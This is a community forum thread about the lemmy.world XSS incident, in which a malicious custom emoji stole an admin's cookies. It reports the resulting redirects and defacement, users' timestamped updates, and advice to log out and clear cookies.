If you are a lemmy.world user, log out and log back in to clear cookies!
Last night, lemmy.world was compromised via an XSS vulnerability with custom emoji. Using this vulnerability, attackers took control of an admin account. The site redirected to mp4 files when logged in, and porn sites when not logged in. The issue was resolved by lemmy.world admins soon after it started, but the attacker regained control of the compromised admin account around ten minutes after resolution, redirecting users to the same mp4 files and sites. Soon after that, the site became inaccessable. The issue is currently resolved, and lemmy dev team has been notified of this vulnerability. sh.itjust.works will not be affected, as we do not have any custom emojis. If you own an instance with custom emojis, it is advised to remove these emojis and clear your cookies.
The following is the original post:
PSA: DO NOT ATTEMPT TO ACCESS LEMMY.WORLD, THERE MIGHT BE MALWARE
Lemmy.world member here. I created this account after .world started redirecting me to porn sites and odd mp4 files. We might want to defederate to limit the potential impact. Also, SJW might be affected by the same vulnerabilities as .world, so maybe the admins here should look at that.
Edit: Situation seems to have stabilized. Some site icons aren’t loading, but otherwise everything seems stable. Read Edit2
Edit2: HOLY SHIT ITS BACK Read Edit3
Edit3: lemmy.world is now down as of 10:56 PM CST (USA) Read Edit4
Edit4: lemmy.world is now up, but serving an error as of 11:03 CST (USA) See a screenshot of this error. I also got logged out, hopefully it doesn’t mean they just wiped the databases lol.
Edit5: Edit4 still applies, but I can now access lemmy.world via Memmy on my phone. Wefwef (Voyager now) does not work, however. Timestamp: 11:34 PM CST (USA)
Edit6: lemmy.world restored. Compromised admin account said something in a weird post. I’m going to bed now, my brain is play-dough rn. Will update you guys tomorrow morning.
Talk about feeling like the old internet. I was wondering how I would get tricked into seeing something gross by some shock-humor edgelord.
Time to just grab a pint and wait this out. Lol
Vietnam flashbacks of shock sites.
Fuck that zombie.
This is the unregulated chaos I’ve been missing from my internet. Feels like home.
The vulnerability appeared to be from a custom emoji that they were running. SJW does not use any custom emoji so we should not be affected. In either case lemmy.world has now been restored and is back online. I’ll keep an extra eye on this instance until the patch gets released shortly.
Nice! Yeah, seems to be that lemmy.world logo emoji that stole your cookies. There were
peoplecompromised accounts posting them everywhere on .world.Thanks for the update, we all appreciate it!
Who would have thought an emoji could be a source of a vulnerability.
lemmy.blahaj.zone just got hit by it too
Confirmed - fucked on my end too. Looks like the 18.1 update had some sort of major vulnerability.
They seem to be down at the moment. I seriously hope SJW is not affected.
Looks like the work of some junior edgelord.
Spez?
@Zeppo Hah! No doubt
Wouldn’t put it past him…
Not himself. He’d task some slave-underling with doing it.
deleted by creator
Well, on the bright side of things, I’m able to find out about my main server going down from the dozens of other active instances.
XSS vulnerability reported: https://sh.itjust.works/post/923025
Damn. SJW and .world share the same lemmy source code. Could what is happening to .world happen to SJW? I’d take a dig into the lemmy code, but my brain is literal mush right now, its 11:16 PM here.
Potentially. Apparently it’s spreading through comments, not just the sidebar.
What’s the impact for other instance users ?
None ? lemmy.world was down during the night and is fixed this morning that’s it ?
is there a risk that interaction with lemmy.world are leaked including potential “personal data” ?
is there a risk that smarter hackers could use the breach to access the DB behind some lemmy instances without anybody noticing it ?
Lemmy.world was defaced last night. As far as I know, there is no DB breach. An XSS vulnerability was abused to steal the cookies of an admin account.
Still getting the redirect at 3:30 AM UTC. Also, first post from my kbin backup.
Yup, I got “this website has been seized by reddit for copyright infringment”. Very mature
welcome to kbin, sorry to hear about the happenings at your homebase
About 10:38 pm CST I had just opened it on my browser and it flashed a “Reddit has taken over this site for copyright infringement”. And the icon at the top was changed for Israel with the words about raping a child on it. Definitely something wonky going on, but I haven’t seen any redirects to anything off site. Definitely not going back from my computer (sounds like the app is safe, but only will check for an update).
Yeah, I get that too, minus the Reddit part. However, during the ten minute span where the attack was resolved (then restarted), a mod/admin account reported that it was caused by a compromised admin account, so not Reddit taking over the site via copyright law. They removed the account, but the issue seems to be back now.
Yeah! Considering being repeatedly attempted (and succeeding)…I’m guessing it may take a little while to deal with.
And I have nowhere to go but Kbin because Beehaw is unstable and I don’t want to open up a fourth account. Accumulating fediverse accounts should be the last thing you do
Definitely need to bleach my eyes after that ‘attack’… saw it unfold and unfortunately saw too much.
There are times when it pays to not be updated of what’s going on. This is one of those times. Sorry your eyes had to be subjected to that torture. My first experience with those sites were similar years ago. At work. Lmao fml
Same, my friend, same
I’m not seeing anything different with lemmy.world on my end. Can anyone else confirm what OP is seeing?
Edit: Reading that it was resolved in another thread.
Second edit: Nope, not resolved
Visited it again, seems restored. I’ll update the post.See original postYup I saw elsewhere that the compromised admin account was removed.Edited again, site has been re- compromised.See original post
Currently getting redirected when visiting lemme.world
Single 🔧 vs Federated ActivityPub instance, who wins
😂😂
Side note: glad the lemmy devs and mods able to figure it out and all while doing this part time. Great community yall. Hope to contribute my time as well.
damn, any idea on how?
An admin had their account compromised. The other admins have since fixed the account and everything should be operational again.
EDIT: Well the site’s still down while they clean up the mess that was left behind. But I think the root problem is fixed now. Should be just a matter of time before they flip the switch again.
A .world mod/admin mentioned a compromised admin account. They removed the account, but the issue returned soon after I made the first edit to the post.
